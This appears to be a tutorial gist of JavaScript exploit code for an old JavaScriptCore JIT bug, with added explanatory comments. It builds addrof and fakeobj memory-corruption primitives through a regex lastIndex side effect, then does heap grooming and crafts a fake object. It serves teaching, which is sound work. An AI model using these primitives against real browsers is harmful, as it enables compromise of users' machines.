@LiveOverflow
Created June 22, 2019 23:12
Browser Exploitation - bowser 0x05
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
/**
 * addrof primitive (per the gist's own label): returns the raw value found in
 * a double-typed array slot after `val` has been swapped into that slot from
 * inside a callback the JIT-compiled reader is not expecting.
 *
 * What the code visibly does: `AddrGetter` runs a sticky-regex match and then
 * reads `array[0]`; `lastIndex` is replaced by an object whose `toString`
 * writes `val` into `array[0]` while the match coerces `lastIndex`; the
 * optimized `AddrGetter` then returns `array[0]`. The leak depends on the
 * engine still treating the slot as a double at that point — a JIT
 * side-effect modelling bug in an old JavaScriptCore build (see the
 * referenced repository for the affected version). On a patched engine this
 * simply returns the object, with no address disclosure.
 *
 * NOTE(review): the exact statement order and the 10000-iteration warm-up
 * are what get the reader JIT-compiled; do not restyle this function.
 *
 * @param {*} val - the object whose address is to be read out
 * @returns {number|*} the slot contents as a double on a vulnerable engine,
 *   otherwise `val` itself
 */
function addrof(val) {
// One-element double array: the slot the JIT is expected to type as double.
var array = [13.37];
// Sticky flag: the match reads and coerces `lastIndex` before matching.
var reg = /abc/y;
// Target function
var AddrGetter = function(array) {
//reg[Symbol.match]();
// The match is the call whose side effects (the lastIndex coercion below)
// are presumably not modelled by the optimizer — TODO confirm against the
// referenced writeup.
"abc".match(reg);
return array[0];
}
// Force optimization
// 10000 calls with a double-only array warm the function into the JIT.
for (var i = 0; i < 10000; ++i)
AddrGetter(array);
// Setup haxx
// Implicit global (no `var`); would throw under 'use strict' and leaks into
// the global scope across calls.
regexLastIndex = {};
// Invoked when the match coerces `lastIndex` to a number; swaps an object
// into the slot the compiled reader assumes holds a double, then yields a
// valid index so the match proceeds normally.
regexLastIndex.toString = function() {
array[0] = val;
return "0";
};
reg.lastIndex = regexLastIndex;
// Do it!
return AddrGetter(array);
}
// fakeobj primitive
/**
 * fakeobj primitive (per the gist's own label): the mirror image of
 * `addrof` — writes the double `dbl` into an array slot that, by the time the
 * write lands, holds an object, and returns whatever the slot then yields.
 *
 * What the code visibly does: `AddrSetter` runs a sticky-regex match and then
 * stores `dbl` into `array[0]`; `lastIndex` is replaced by an object whose
 * `toString` first stores a plain object into `array[0]` during the match's
 * coercion of `lastIndex`. If the compiled `AddrSetter` still performs a raw
 * double store (the same JIT bug as in `addrof`), the raw bits of `dbl` end
 * up where an object pointer is expected. On a patched engine the slot just
 * contains the number `dbl`.
 *
 * NOTE(review): statement order and the warm-up loop are load-bearing for
 * JIT compilation; keep the body as is.
 *
 * @param {number} dbl - double whose bit pattern is written into the slot
 * @returns {*} the contents of `array[0]` after the store
 */
function fakeobj(dbl) {
// One-element double array, as in `addrof`.
var array = [13.37];
// Sticky flag: the match coerces `lastIndex` before matching.
var reg = /abc/y;
// Target function
var AddrSetter = function(array) {
//reg[Symbol.match]();
"abc".match(reg);
// Raw double store once compiled — the write the exploit relies on.
array[0] = dbl;
}
// Force optimization
for (var i = 0; i < 10000; ++i)
AddrSetter(array);
// Setup haxx
// Implicit global (no `var`), shared with `addrof`; would throw under
// 'use strict'.
regexLastIndex = {};
// Runs during the match's coercion of `lastIndex`: converts the slot to an
// object slot before the compiled double store executes.
regexLastIndex.toString = function() {
array[0] = {};
return "0";
};
reg.lastIndex = regexLastIndex;
// Do it!
AddrSetter(array);
return array[0];
}
// Allocate 0x2000 throwaway objects, each with `x` plus a unique `prop_<i>`
// name. The page does not say what this is for; presumably it is heap /
// structure grooming so the `fake` object below lands in a predictable
// layout — TODO confirm against the linked video.
// `test` is an implicit global (no `var`); would throw under 'use strict'.
for(var i=0; i<0x2000; i++) {
test = {}
test.x = 1
test['prop_'+i] = 2
}
// The object whose first inline property carries a crafted double. The
// chosen value is used for its raw 64-bit pattern; the page does not explain
// what that pattern encodes (see the video). Implicit global as well.
fake = {}
fake.a = 7.082855106403439e-304
fake.b = 2
fake.c = 1337
// Adding `c` and then deleting `b` leaves `fake` in a specific property
// layout; not explained on the page — TODO confirm against the video.
delete fake.b
// Read the object's slot contents out as a double (implicit global `adr`).
adr = addrof(fake)
// `print` is a JS shell builtin (e.g. the jsc shell), not browser JavaScript.
print(adr)
// should hand back the same object. To fake an object you first have to move the address forward by 0x10; see the video for how to do that with python.
// `hax` is an implicit global and is not used afterwards on this page.
hax = fakeobj(adr)